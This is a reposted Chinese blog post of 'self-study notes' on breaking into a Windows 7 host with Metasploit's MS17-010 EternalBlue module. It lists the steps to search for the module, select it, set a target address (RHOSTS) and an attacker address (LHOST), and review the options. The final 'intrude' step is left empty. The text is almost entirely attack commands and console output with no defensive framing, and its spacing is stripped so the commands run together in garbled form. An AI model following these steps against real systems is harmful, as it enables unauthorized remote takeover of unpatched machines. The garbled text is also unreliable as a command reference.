网络安全之入侵win7主机自学笔记
番茄系统家园 · 2021-07-30 07:44:23
第一步、
首先输入命令用以启动。
~#[-]***[-]*[-]***[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|$a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%][%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|$S?a,|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%][%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|?a,|%%%%%%%%__%%%%%%%%%__%%__%%%%][%.--------..-----.||_.---.-.|.,a$%|.-----.||.-----.|__|||_%%][%|||-__||_||_||,,aS$||_||||_||||_|%%][%|__|__|__||||____||||%$P||__||__||||__||____|%%][%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|a,||__|%%%%%%%%%%%%%%%%%%%%%%%%%%][%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%][%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%$%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%][%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%][metasploitv5.0.38-dev]----[1912exploits-1073auxiliary-329post]----[545payloads-45encoders-10nops]----[3evasion]msf5
第二步进入后扫描ms17漏洞这里以010为例
msf5searchms17-010MatchingModules#NameDisclosureDateRankCheckDescription----------------------------------------0auxiliary/admin/smb/ms17_010_command2017-03-14normalYesMS17-010EternalRomance/EternalSynergy/EternalChampionSMBRemoteWindowsCommandExecution1auxiliary/scanner/smb/smb_ms17_010normalYesMS17-010SMBRCEDetection2exploit/windows/smb/ms17_010_eternalblue2017-03-14averageYesMS17-010EternalBlueSMBRemoteWindowsKernelPoolCorruption3exploit/windows/smb/ms17_010_eternalblue_win82017-03-14averageNoMS17-010EternalBlueSMBRemoteWindowsKernelPoolCorruptionforWin84exploit/windows/smb/ms17_010_psexec2017-03-14normalYesMS17-010EternalRomance/EternalSynergy/EternalChampionSMBRemoteWindowsCodeExecutionmsf5
三、使用扫描出的漏洞
msf5useexploit/windows/smb/ms17_010_eternalbluemsf5exploit(windows/smb/ms17_010_eternalblue)
四、配置对象
msf5exploit(windows/smb/ms17_010_eternalblue)setRHOSTS192.168.22.105**远端地址**RHOSTS192.168.22.105msf5exploit(windows/smb/ms17_010_eternalblue)setLHOST192.168.22.195**kail地址**LHOST192.168.22.195
五、查看参数
--------------------------------------RHOSTS192.168.22.105yesThetargetaddressrangeorCIDRidentifierRPORT445yesThetargetport(TCP)SMBDomain.no(Optional)TheWindowsdomaintouseforauthenticationSMBPassno(Optional)ThepasswordforthespecifiedusernameSMBUserno(Optional)TheusernametoauthenticateasVERIFY_ARCHtrueyesCheckifremotearchitecturematchesexploitTarget.VERIFY_TARGETtrueyesCheckifremoteOSmatchesexploitTarget.Exploittarget:IdName------0Windows7andServer2008R2(x64)AllServicePacksmsf5exploit(windows/smb/ms17_010_eternalblue)
六、侵入对方主机
免责声明: 凡标注转载/编译字样内容并非本站原创,转载目的在于传递更多信息,并不代表本网赞同其观点和对其真实性负责。如果你觉得本文好,欢迎推荐给朋友阅读;本文链接: https://m.nndssk.com/post/21335.html。
